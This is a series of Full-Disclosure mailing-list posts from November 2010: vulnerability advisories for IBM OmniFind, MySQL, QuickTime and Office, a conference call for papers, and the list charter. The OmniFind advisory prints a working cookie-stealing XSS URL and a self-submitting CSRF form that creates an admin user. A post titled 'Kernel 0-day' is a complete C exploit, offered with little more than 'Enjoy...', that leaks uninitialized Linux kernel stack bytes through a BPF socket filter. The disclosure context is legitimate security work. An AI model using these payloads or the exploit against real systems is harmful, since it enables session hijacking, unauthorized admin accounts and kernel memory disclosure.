[Full-disclosure] IBM OmniFind - several vulnerabilities
||| Security Advisory||| ||| CVE-2010-3890 (CVE candidate)||| ||| CVE-2010-3891 (CVE candidate)||| ||| CVE-2010-3892 (CVE candidate)||| ||| CVE-2010-3893 (CVE candidate)||| ||| CVE-2010-3894 (CVE candidate)||| ||| CVE-2010-3895 (CVE candidate)||| ||| CVE-2010-3896 (CVE candidate)||| ||| CVE-2010-3897 (CVE candidate)||| ||| CVE-2010-3898 (CVE candidate)||| ||| CVE-2010-3899 (CVE candidate)||| IBM OmniFind several issues === Date released: 11/2010 Date reported: 04/2009 by Fatih Kilic Fraunhofer Institute for Secure Information Technology fatih.ki...@sit.fraunhofer.de http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899 Vendor: IBM Product: IBM OmniFind Enterprise Edition Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/ Vulnerabilities: - Cross-Site-Scripting (XSS) - Cross-Site-Request-Forgery (XSRF) - Session fixation - Session impersonation - Remote buffer overflow - Privilege escalation in two applications - Missing authentication in configuration panel - Admin password is delivered in plaintext inside the server response - Cookies are set for root path, not application path - Crawler endless loop + Background: Quoting http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/: | IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters through knowledge driven search. | | It’s designed to drive users to the knowledge they seek and enhance the visibility of content and context of your organization's unstructured information. | |* Dynamic - delivers complete dynamic facet capabilities, type-ahead search, real-time content alerting, is reactive to search-led content exploration |* Tailorable - delivers business adjustable relevancy and UIMA standardization for entity identification and tuned semantic searching |* Supportable - delivers search on 20+ platform, connects to 30+ repositories |* Secure - delivers enforced security across content repositories |* Scalable - lucene-based index for enterprise level scalability + Overview: + Technical details: * Cross-Site-Scripting (XSS) (CVE-2010-3890) The GET parameter »command« used inside the administration interface is embedded directly into the HTML source without any input validation or output sanitization. Using this parameter the attacker can inject arbitrary Javascript code which will be run in the session context of other users. As session credentials are stored within cookies, an attacker can steal the cookie information and impersonate (CVE-2010-3893) the session and control the web application within the browser context of the victim. Exploit to show cookies: http://omnifind-host/ESAdmin/collection.do?command=scriptalert(document. cookie);/script * Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891) The forms in the administrator interface are not protected against XSRF. The attacker can do any action in the context of the victim. An example attack scenario could be: The attacker creates a malicious website with a prepared form to add a new user, which will be submitted on load. Exploit to add an admin user: html headtitleSome seemingly benign web-site/title/head body onLoad=document.forms[0].submit(); form method=post action=http://omnifind-host/ESAdmin/security.do; input type=hidden name=command value=saveNewUser/ input type=hidden name=user.name value=joemueller/ input type=hidden name=user.role value=0/ input type=hidden name=user.allCollections value=true/ input type=hidden name=apply value=OK/ /form /body /html Solution: Fixed in release v9.1 of Omnifind. * Session fixation (CVE-2010-3892) The login form of the administrator interface is vulnerable to session fixation attacks. And attacker can use a prepared website or a XSS vulnerability (CVE-2010-3890) to change session ID (SID) of the login form. The SID have to
[Full-disclosure] Hackito Ergo Sum 2011 - Call For Paper - HES2011 CFP
Hackito Ergo Sum 2011 - Call For Paper - HES2011 CFP ** http://hackitoergosum.org ** 7-9 April 2011 / Paris / France 111 111 111 1110 111 1110 111 1110 111 1110 111 1000 111 1000 111 1000 111 1000 111 100011111100 011 100011111100 011 100011111100 011 100011111100 011 1000 011 1000 011 1000 011 1000 011 1000 011 1000 011 1000 011 111111100000 011 111111100000 011 111111100000 011 111111100000 011 100011111100 111 100000011100 111 100000011100 111 100000011100 111 111 111 1 1HES 2011 1 Paris, 7-9 April 2011 1 111 111 --[ Synopsis: Hackito Ergo Sum conference will be held from April 7th to the 9th of 2011 in Paris, France. Following last edition's success, HES2011 will be a bigger event with even more talks, focusing on hardcore computer network security, insecurity, vulnerability analysis, reverse engineering, research and hacking, and will try to keep the high quality content. Our dear Program Committee is there to ensure this. HES will this year be a fully international-oriented conference, 100% in English, aiming to gather the best security researchers, experts and decision makers in one room. --[ Introduction: The goal of this conference is to promote security research, broaden public awareness and create an open forum so that communication between the researchers, the security industry, the experts and the public can happen. Last year, we pioneered a domain with the first Capture The Flag (CTF) contest on FPGA, with excellent result that exceeded by far our expectations. This year, new contests will run with hopefully even more diverse and new approaches to security. Of course, network-based CTF and lockpicking contest will still happen. We will have a specific session for new works, including slots for new presenters -i.e. typically people whose personal research are extremely interesting but who do not usually present at conferences- because security innovations occur at the fringe of the security industry, very often by passionate people, and that's what we are and love. Submissions from students, academics or otherwise passionate people from anywhere on the internet are therefore most welcome. We will also have an anonymous side track so that people who wish to present sensitive subjects can do so in total freedom. As
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:222 ] mysql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:222 http://www.mandriva.com/security/ ___ Package : mysql Date: November 9, 2010 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in mysql: * Joins involving a table with with a unique SET column could cause a server crash (CVE-2010-3677). * Use of TEMPORARY InnoDB tables with nullable columns could cause a server crash (CVE-2010-3680). * The server could crash if there were alternate reads from two indexes on a table using the HANDLER interface (CVE-2010-3681). * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682). * During evaluation of arguments to extreme-value functions (such as LEAST() and GREATEST()), type errors did not propagate properly, causing the server to crash (CVE-2010-3833). * The server could crash after materializing a derived table that required a temporary table for grouping (CVE-2010-3834). * A user-variable assignment expression that is evaluated in a logical expression context can be precalculated in a temporary table for GROUP BY. However, when the expression value is used after creation of the temporary table, it was re-evaluated, not read from the table and a server crash resulted (CVE-2010-3835). * Pre-evaluation of LIKE predicates during view preparation could cause a server crash (CVE-2010-3836). * GROUP_CONCAT() and WITH ROLLUP together could cause a server crash (CVE-2010-3837). * Queries could cause a server crash if the GREATEST() or LEAST() function had a mixed list of numeric and LONGBLOB arguments, and the result of such a function was processed using an intermediate temporary table (CVE-2010-3838). * Queries with nested joins could cause an infinite loop in the server when used from stored procedures and prepared statements (CVE-2010-3839). * The PolyFromWKB() function could crash the server when improper WKB data was passed to the function (CVE-2010-3840). Additionally the default behaviour of using the mysqlmanager instead of the mysqld_safe script has been reverted in the SysV init script because of instability issues with the mysqlmanager. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 The updated packages have been upgraded to mysql 5.0.91 and patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3677 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3680 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3681 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3682 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3833 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3834 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3835 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3836 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3840 http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html http://bugs.mysql.com/bug.php?id=54575 http://bugs.mysql.com/bug.php?id=54044 http://bugs.mysql.com/bug.php?id=54007 http://bugs.mysql.com/bug.php?id=52711 http://bugs.mysql.com/bug.php?id=55826 http://bugs.mysql.com/bug.php?id=55568 http://bugs.mysql.com/bug.php?id=55564 http://bugs.mysql.com/bug.php?id=54568 http://bugs.mysql.com/bug.php?id=54476 http://bugs.mysql.com/bug.php?id=54461 http://bugs.mysql.com/bug.php?id=53544 http://bugs.mysql.com/bug.php?id=51875 ___ Updated Packages: Mandriva Linux 2009.0: eb907536a0eeaaa029dc177ea9ef0a39 2009.0/i586/libmysql15-5.0.91-0.1mdv2009.0.i586.rpm 6478e39626354dceed037e214ec6cb1b 2009.0/i586/libmysql-devel-5.0.91-0.1mdv2009.0.i586.rpm f241d659367edc2514f252a770715ce3 2009.0/i586/libmysql-static-devel-5.0.91-0.1mdv2009.0.i586.rpm 3acc56592aa5ef4ae5227c204a3a5931 2009.0/i586/mysql-5.0.91-0.1mdv2009.0.i586.rpm 6dd27cf8a8a6ddfcba4ff41199e5af53 2009.0/i586/mysql-bench-5.0.91-0.1mdv2009.0.i586.rpm 969531a60f2b36ce51504ced260b0df9 2009.0/i586/mysql-client-5.0.91-0.1mdv2009.0.i586.rpm 0d6e8961bb929492b105d4552622eaa4 2009.0/i586/mysql-common-5.0.91-0.1mdv2009.0.i586.rpm
[Full-disclosure] ZDI-10-244: Apple Quicktime Movie Malformed H.264 Sample Remote Code Execution Vulnerability
ZDI-10-244: Apple Quicktime Movie Malformed H.264 Sample Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-244 November 9, 2010 -- CVE ID: CVE-2010-0515 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of samples from a malformed MOV file utilizing the H.264 codec. While parsing data to render the stream, the application will miscalculate a length that is used to initialize a heap chunk that was allocated in a header. If the length is larger than the size of the chunk allocated, then a memory corruption will occur which can lead to code execution under the context of the application. -- Vendor Response: Apple states: Fixed in QuickTime 7.6.6 http://support.apple.com/kb/HT4104 -- Disclosure Timeline: 2009-12-04 - Vulnerability reported to vendor 2010-11-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:223 ] mysql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:223 http://www.mandriva.com/security/ ___ Package : mysql Date: November 9, 2010 Affected: 2009.1, 2010.0, 2010.1 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in mysql: * During evaluation of arguments to extreme-value functions (such as LEAST() and GREATEST()), type errors did not propagate properly, causing the server to crash (CVE-2010-3833). * The server could crash after materializing a derived table that required a temporary table for grouping (CVE-2010-3834). * A user-variable assignment expression that is evaluated in a logical expression context can be precalculated in a temporary table for GROUP BY. However, when the expression value is used after creation of the temporary table, it was re-evaluated, not read from the table and a server crash resulted (CVE-2010-3835). * Pre-evaluation of LIKE predicates during view preparation could cause a server crash (CVE-2010-3836). * GROUP_CONCAT() and WITH ROLLUP together could cause a server crash (CVE-2010-3837). * Queries could cause a server crash if the GREATEST() or LEAST() function had a mixed list of numeric and LONGBLOB arguments, and the result of such a function was processed using an intermediate temporary table (CVE-2010-3838). * Queries with nested joins could cause an infinite loop in the server when used from stored procedures and prepared statements (CVE-2010-3839). * The PolyFromWKB() function could crash the server when improper WKB data was passed to the function (CVE-2010-3840). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3833 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3834 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3835 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3836 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3840 http://bugs.mysql.com/bug.php?id=55826 http://bugs.mysql.com/bug.php?id=55568 http://bugs.mysql.com/bug.php?id=55564 http://bugs.mysql.com/bug.php?id=54568 http://bugs.mysql.com/bug.php?id=54476 http://bugs.mysql.com/bug.php?id=54461 http://bugs.mysql.com/bug.php?id=53544 http://bugs.mysql.com/bug.php?id=51875 ___ Updated Packages: Mandriva Linux 2009.1: c24fb902d05f9106dd7b62d7bf7c961e 2009.1/i586/libmysql16-5.1.42-0.7mdv2009.1.i586.rpm 9906c87fbd2c5653d14e307ca6cb8396 2009.1/i586/libmysql-devel-5.1.42-0.7mdv2009.1.i586.rpm 7549265a5c2c1f812a4bcff401468167 2009.1/i586/libmysql-static-devel-5.1.42-0.7mdv2009.1.i586.rpm 2d5c4c004fb36b096f2162f3cc54a828 2009.1/i586/mysql-5.1.42-0.7mdv2009.1.i586.rpm 61b53b422cd8a9d63014f9fee9af1974 2009.1/i586/mysql-bench-5.1.42-0.7mdv2009.1.i586.rpm 02f151c312608d8d56f9494f20908a8c 2009.1/i586/mysql-client-5.1.42-0.7mdv2009.1.i586.rpm a97b68d21ed4dd412ce960960c93eab8 2009.1/i586/mysql-common-5.1.42-0.7mdv2009.1.i586.rpm 5cda25980548ccfde2261781eb6790e3 2009.1/i586/mysql-doc-5.1.42-0.7mdv2009.1.i586.rpm 5b5f3444c6d2905c904b8bbda929a721 2009.1/i586/mysql-max-5.1.42-0.7mdv2009.1.i586.rpm 71b29aa05beb90ed4b2d82fddfbe2656 2009.1/i586/mysql-ndb-extra-5.1.42-0.7mdv2009.1.i586.rpm b6e47c4d9d14797e2fe886a5de0f4fdd 2009.1/i586/mysql-ndb-management-5.1.42-0.7mdv2009.1.i586.rpm 50c738ab7f802e8ba2df8eb3bf1a6fbb 2009.1/i586/mysql-ndb-storage-5.1.42-0.7mdv2009.1.i586.rpm 93a807c4646a31e1cc4bb3886c089e9b 2009.1/i586/mysql-ndb-tools-5.1.42-0.7mdv2009.1.i586.rpm 089921dec5b57917a3b42b3165e260eb 2009.1/SRPMS/mysql-5.1.42-0.7mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: fb1064832c231c168afd50a0d79bc4dd 2009.1/x86_64/lib64mysql16-5.1.42-0.7mdv2009.1.x86_64.rpm a58727f9e04d17c3587076470ddb35da 2009.1/x86_64/lib64mysql-devel-5.1.42-0.7mdv2009.1.x86_64.rpm 52a5213b49fb99a67c2c3c693c5610c1 2009.1/x86_64/lib64mysql-static-devel-5.1.42-0.7mdv2009.1.x86_64.rpm 2c8620f213952d425ff67a70d96091a9 2009.1/x86_64/mysql-5.1.42-0.7mdv2009.1.x86_64.rpm b9909bc2b87297f7c8cee7fcac2d3ead 2009.1/x86_64/mysql-bench-5.1.42-0.7mdv2009.1.x86_64.rpm e48643fe42c2ebd534da6f67d9adf38b 2009.1/x86_64/mysql-client-5.1.42-0.7mdv2009.1.x86_64.rpm d35e8889430bf446d6e1b1e8f43f72d7 2009.1/x86_64/mysql-common-5.1.42-0.7mdv2009.1.x86_64.rpm 1304778f16541d60db286239bcbe6ef2
[Full-disclosure] ZDI-10-245: Microsoft Office PowerPoint Unknown Animation Node Remote Code Execution Vulnerability
ZDI-10-245: Microsoft Office PowerPoint Unknown Animation Node Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-245 November 9, 2010 -- CVE ID: CVE-2010-2573 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Microsoft -- Affected Products: Microsoft Office PowerPoint -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10630. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Powerpoint 2003. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application trusting a value defined within a file. This value will have some arithmetic performed on it, and subsequently be used as a counter for a processing loop. By modifying this value, an attacker can reliably corrupt memory. Successful exploitation will lead to code execution under the context of the application. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx -- Disclosure Timeline: 2010-06-02 - Vulnerability reported to vendor 2010-11-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-246: Microsoft Excel MSODrawing Improper Exception Handling Remote Code Execution Vulnerability
ZDI-10-246: Microsoft Excel MSODrawing Improper Exception Handling Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-246 November 9, 2010 -- CVE ID: CVE-2010-3335 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Microsoft -- Affected Products: Microsoft Office Excel -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10634. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the application frees resources when parsing a malformed Office Art record. Due to the application not properly freeing up resources during handling a parsing error, the application will later access the freed reference which can lead to code execution under the context of the application. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-11-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:225 ] libmbfl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:225 http://www.mandriva.com/security/ ___ Package : libmbfl Date: November 9, 2010 Affected: 2010.0, 2010.1 ___ Problem Description: A vulnerability was discovered and corrected in libmbfl (php): * Fix bug #53273 (mb_strcut() returns garbage with the excessive length parameter) (CVE-2010-4156). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156 http://bugs.php.net/bug.php?id=49354 http://bugs.php.net/bug.php?id=53273 ___ Updated Packages: Mandriva Linux 2010.0: a3ff784ac8c403e09c3aaa8e05eb5d11 2010.0/i586/libmbfl1-1.1.0-0.2mdv2010.0.i586.rpm 349a58108b4f8e771417806e47d3abf8 2010.0/i586/libmbfl-devel-1.1.0-0.2mdv2010.0.i586.rpm 46a3d7535bbcabf299a10fc0b5611967 2010.0/SRPMS/libmbfl-1.1.0-0.2mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 84a2522e5d9f99c8757b264fc1ccf8bd 2010.0/x86_64/lib64mbfl1-1.1.0-0.2mdv2010.0.x86_64.rpm 858a213d457bc91cfb14bac8f0fca6ae 2010.0/x86_64/lib64mbfl-devel-1.1.0-0.2mdv2010.0.x86_64.rpm 46a3d7535bbcabf299a10fc0b5611967 2010.0/SRPMS/libmbfl-1.1.0-0.2mdv2010.0.src.rpm Mandriva Linux 2010.1: c2a6706a1a63f23422de732317c875b2 2010.1/i586/libmbfl1-1.1.0-0.2mdv2010.1.i586.rpm e61cd27667224682e0be0f518765 2010.1/i586/libmbfl-devel-1.1.0-0.2mdv2010.1.i586.rpm 529952ef37422e1b695da38e8ab6e77a 2010.1/SRPMS/libmbfl-1.1.0-0.2mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: a9df4c7d21e3f8219207f6964d3b5204 2010.1/x86_64/lib64mbfl1-1.1.0-0.2mdv2010.1.x86_64.rpm 48c2d18fa8e20f25675ceedf051a9cea 2010.1/x86_64/lib64mbfl-devel-1.1.0-0.2mdv2010.1.x86_64.rpm 529952ef37422e1b695da38e8ab6e77a 2010.1/SRPMS/libmbfl-1.1.0-0.2mdv2010.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFM2ZuOmqjQ0CJFipgRAlIeAJ459YXySExGECX+EYkPzRXQOQSyrACgzTrQ 3ax4hSV/YDfaKxuixKkGBR8= =KCQC -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kernel 0-day
Enjoy... -Dan /* * You've done it. After hours of gdb and caffeine, you've finally got a shell * on your target's server. Maybe next time they will think twice about * running MyFirstCompSciProjectFTPD on a production machine. As you take * another sip of Mountain Dew and pick some of the cheetos out of your beard, * you begin to plan your next move - it's time to tackle the kernel. * * What should be your goal? Privilege escalation? That's impossible, there's * no such thing as a privilege escalation vulnerability on Linux. Denial of * service? What are you, some kind of script kiddie? No, the answer is * obvious. You must read the uninitialized bytes of the kernel stack, since * these bytes contain all the secrets of the universe and the meaning of life. * * How can you accomplish this insidious feat? You immediately discard the * notion of looking for uninitialized struct members that are copied back to * userspace, since you clearly need something far more elite. In order to * prove your superiority, your exploit must be as sophisticated as your taste * in obscure electronic music. After scanning the kernel source for good * candidates, you find your target and begin to code... * * by Dan Rosenberg * * Greets to kees, taviso, jono, spender, hawkes, and bla * */ #include string.h #include stdio.h #include netinet/in.h #include sys/socket.h #include unistd.h #include stdlib.h #include linux/filter.h #define PORT 37337 int transfer(int sendsock, int recvsock) { struct sockaddr_in addr; char buf[512]; int len = sizeof(addr); memset(buf, 0, sizeof(buf)); if (fork()) return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)addr, len); sleep(1); memset(addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(127.0.0.1); sendto(sendsock, buf, 512, 0, (struct sockaddr *)addr, len); exit(0); } int main(int argc, char * argv[]) { int sendsock, recvsock, ret; unsigned int val; struct sockaddr_in addr; struct sock_fprog fprog; struct sock_filter filters[5]; if (argc != 2) { printf([*] Usage: %s offset (0-63)\n, argv[0]); return -1; } val = atoi(argv[1]); if (val 63) { printf([*] Invalid byte offset (must be 0-63)\n); return -1; } recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (recvsock 0 || sendsock 0) { printf([*] Could not create sockets.\n); return -1; } memset(addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = htonl(INADDR_ANY); if (bind(recvsock, (struct sockaddr *)addr, sizeof(addr)) 0) { printf([*] Could not bind socket.\n); return -1; } memset(fprog, 0, sizeof(fprog)); memset(filters, 0, sizeof(filters)); filters[0].code = BPF_LD|BPF_MEM; filters[0].k = (val ~0x3) / 4; filters[1].code = BPF_ALU|BPF_AND|BPF_K; filters[1].k = 0xff ((val % 4) * 8); filters[2].code = BPF_ALU|BPF_RSH|BPF_K; filters[2].k = (val % 4) * 8; filters[3].code = BPF_ALU|BPF_ADD|BPF_K; filters[3].k = 256; filters[4].code = BPF_RET|BPF_A; fprog.len = 5; fprog.filter = filters; if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, fprog, sizeof(fprog)) 0) { printf([*] Failed to install filter.\n); return -1; } ret = transfer(sendsock, recvsock); printf([*] Your byte: 0x%.02x\n, ret - 248); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kernel 0-day
